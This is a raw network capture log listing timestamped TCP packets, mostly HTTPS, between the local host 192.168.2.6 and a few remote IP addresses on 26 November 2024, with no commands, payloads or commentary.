Nov 26, 2024 00:25:20.141087055 CET	443	49725	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.142108917 CET	49725	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.142117977 CET	443	49725	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.248681068 CET	443	49726	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.291625023 CET	49726	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.350740910 CET	49726	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.350753069 CET	443	49726	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.351370096 CET	49726	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.351377964 CET	443	49726	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.519627094 CET	443	49722	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.519704103 CET	443	49722	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.519768000 CET	49722	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.569201946 CET	443	49724	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.569262028 CET	443	49724	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.569391012 CET	49724	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.591599941 CET	443	49725	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.591685057 CET	443	49725	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.591741085 CET	49725	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.627635002 CET	49722	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.627676964 CET	443	49722	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.627705097 CET	49722	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.627712011 CET	443	49722	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.633611917 CET	49724	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.633620024 CET	443	49724	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.633631945 CET	49724	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.633635998 CET	443	49724	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.644515038 CET	49725	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.644546032 CET	443	49725	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.644562960 CET	49725	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.644571066 CET	443	49725	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.702652931 CET	49730	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.702692986 CET	443	49730	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.702780008 CET	49730	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.710643053 CET	443	49723	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.710705042 CET	443	49723	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.710772991 CET	49723	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.735994101 CET	443	49726	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.736071110 CET	443	49726	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.736149073 CET	49726	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.833249092 CET	49731	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:20.833295107 CET	443	49731	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:20.833354950 CET	49731	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:20.833626032 CET	49731	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:20.833640099 CET	443	49731	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:20.836591959 CET	49732	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.836620092 CET	443	49732	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.836692095 CET	49732	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.837311983 CET	49730	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.837337971 CET	443	49730	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.837539911 CET	49732	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.837553978 CET	443	49732	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.837841034 CET	49723	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.837841034 CET	49723	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.837851048 CET	443	49723	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.837860107 CET	443	49723	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.840667963 CET	49726	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.840687990 CET	443	49726	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.840701103 CET	49726	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.840706110 CET	443	49726	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.842562914 CET	49733	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:20.842600107 CET	443	49733	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:20.842653990 CET	49733	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:20.843110085 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:20.843146086 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:20.843202114 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:20.843422890 CET	49733	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:20.843434095 CET	443	49733	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:20.843588114 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:20.843607903 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:20.913508892 CET	49736	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.913513899 CET	49735	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.913513899 CET	49737	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:20.913564920 CET	443	49736	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.913568020 CET	443	49735	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.913583040 CET	443	49737	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:20.913678885 CET	49736	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.913707018 CET	49735	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.913731098 CET	49737	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:20.914144993 CET	49737	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:20.914158106 CET	443	49737	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:20.916979074 CET	49738	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.917012930 CET	443	49738	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.917069912 CET	49738	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.919678926 CET	49736	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.919704914 CET	443	49736	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.920052052 CET	49735	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.920073032 CET	443	49735	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:20.921956062 CET	49738	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:20.921976089 CET	443	49738	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.560518980 CET	443	49732	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.564455032 CET	49732	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:22.564475060 CET	443	49732	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.564939022 CET	49732	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:22.564944983 CET	443	49732	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.577567101 CET	443	49731	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.581747055 CET	443	49733	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.584021091 CET	49733	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.584033012 CET	443	49733	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.584307909 CET	49731	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.584325075 CET	443	49731	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.584733963 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.584907055 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.584937096 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.585093021 CET	443	49733	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.585176945 CET	49733	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.585413933 CET	443	49731	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.585469007 CET	49731	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.585984945 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.586040020 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.586433887 CET	49733	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.586505890 CET	443	49733	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.586527109 CET	49731	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.586585999 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.586594105 CET	443	49731	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.586658001 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.586925983 CET	49733	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.586931944 CET	443	49733	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.587013960 CET	49731	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.587023020 CET	443	49731	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.587069035 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.587084055 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.603576899 CET	443	49737	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.608544111 CET	49737	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.608568907 CET	443	49737	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.609637976 CET	443	49737	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.609711885 CET	49737	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.613723040 CET	49737	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.613831997 CET	443	49737	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.614196062 CET	49737	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.614207029 CET	443	49737	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.620376110 CET	443	49730	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.623589993 CET	49731	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.623652935 CET	443	49731	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:22.623718977 CET	49731	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.639424086 CET	49730	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:22.639456034 CET	443	49730	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.640166044 CET	49730	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:22.640172005 CET	443	49730	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.641263962 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.641313076 CET	49733	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.656833887 CET	49737	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:22.704814911 CET	443	49738	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.705594063 CET	49738	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:22.705631018 CET	443	49738	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.706121922 CET	49738	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:22.706134081 CET	443	49738	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.715513945 CET	80	49715	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:22.715615034 CET	49715	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:22.765783072 CET	443	49735	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.767612934 CET	443	49736	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.768034935 CET	49735	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:22.768059015 CET	443	49735	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.768322945 CET	49736	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:22.768352032 CET	443	49736	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.768640041 CET	49735	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:22.768646002 CET	443	49735	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:22.768842936 CET	49736	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:22.768857956 CET	443	49736	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.081701994 CET	443	49730	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.081768036 CET	443	49730	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.081876993 CET	49730	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.082170963 CET	49730	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.082195997 CET	443	49730	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.082211018 CET	49730	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.082217932 CET	443	49730	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.085947037 CET	49741	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.085993052 CET	443	49741	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.086096048 CET	49741	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.086283922 CET	49741	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.086297989 CET	443	49741	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.240128040 CET	443	49735	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.240195036 CET	443	49735	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.240251064 CET	49735	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.240483999 CET	49735	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.240515947 CET	443	49735	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.240528107 CET	49735	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.240534067 CET	443	49735	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.243766069 CET	49743	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.243792057 CET	443	49743	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.243866920 CET	49743	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.244173050 CET	49743	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.244183064 CET	443	49743	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.252038956 CET	443	49736	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.252098083 CET	443	49736	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.252151012 CET	49736	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.252315998 CET	49736	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.252335072 CET	443	49736	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.252347946 CET	49736	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.252353907 CET	443	49736	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.254822016 CET	49744	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.254848957 CET	443	49744	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.254944086 CET	49744	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.255081892 CET	49744	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.255094051 CET	443	49744	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.275273085 CET	443	49738	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.275355101 CET	443	49738	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.275402069 CET	49738	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.275552034 CET	49738	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.275569916 CET	443	49738	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.275584936 CET	49738	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.275590897 CET	443	49738	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.278441906 CET	49745	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.278476954 CET	443	49745	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.278548002 CET	49745	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.278718948 CET	49745	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.278733969 CET	443	49745	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.437710047 CET	443	49733	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.437874079 CET	443	49733	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.437928915 CET	49733	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.439013004 CET	49733	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.439030886 CET	443	49733	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.460903883 CET	443	49737	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.461049080 CET	443	49737	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.461126089 CET	49737	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.462433100 CET	49737	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.462455034 CET	443	49737	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.476702929 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.476754904 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.476788044 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.476804972 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.476835012 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.476876974 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.476885080 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.489991903 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.490029097 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.490187883 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.490214109 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.490261078 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.529412985 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.539771080 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.539844990 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.539870977 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.587145090 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.597456932 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.649636030 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.649660110 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.668175936 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.668266058 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.668292046 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.681673050 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.681720972 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.681746960 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.691410065 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.691467047 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.691492081 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.702409029 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.702459097 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.702485085 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.716671944 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.716758966 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.716783047 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.729088068 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.729146957 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.729172945 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.742768049 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.742849112 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.742873907 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.756480932 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.756531954 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.756557941 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.771099091 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.771142006 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.771168947 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.780936003 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.781019926 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.781053066 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.794179916 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.794229031 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.794256926 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.836632013 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.858179092 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.865056038 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.865108013 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.865122080 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.865148067 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.865190983 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.872553110 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.886230946 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.886262894 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.886307955 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.886332989 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.886378050 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.899185896 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.912148952 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.912220955 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.912245035 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.923439980 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.923505068 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.923527956 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.935693979 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.935755014 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.935779095 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.945303917 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.945358992 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.945384979 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.955442905 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.955513000 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.955538988 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.964873075 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.964937925 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.964950085 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.964962959 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.965008020 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.973474026 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.982044935 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.982115984 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.982141018 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.988673925 CET	443	49732	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.988902092 CET	443	49732	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.988960028 CET	49732	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.989054918 CET	49732	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.989065886 CET	443	49732	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.989078045 CET	49732	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.989082098 CET	443	49732	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.991559029 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.991625071 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:23.991648912 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:23.992598057 CET	49746	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.992633104 CET	443	49746	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:23.992731094 CET	49746	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.992930889 CET	49746	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:23.992948055 CET	443	49746	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:24.000179052 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.000237942 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.000262976 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.007579088 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.007648945 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.007673979 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.018163919 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.018233061 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.018260002 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.026443005 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.026506901 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.026530981 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.032819033 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.032879114 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.032902002 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.043540001 CET	443	49734	142.250.181.100	192.168.2.6
Nov 26, 2024 00:25:24.043606043 CET	49734	443	192.168.2.6	142.250.181.100
Nov 26, 2024 00:25:24.043615103 CET	443	49734	142.250.181.100	192.168.2.6
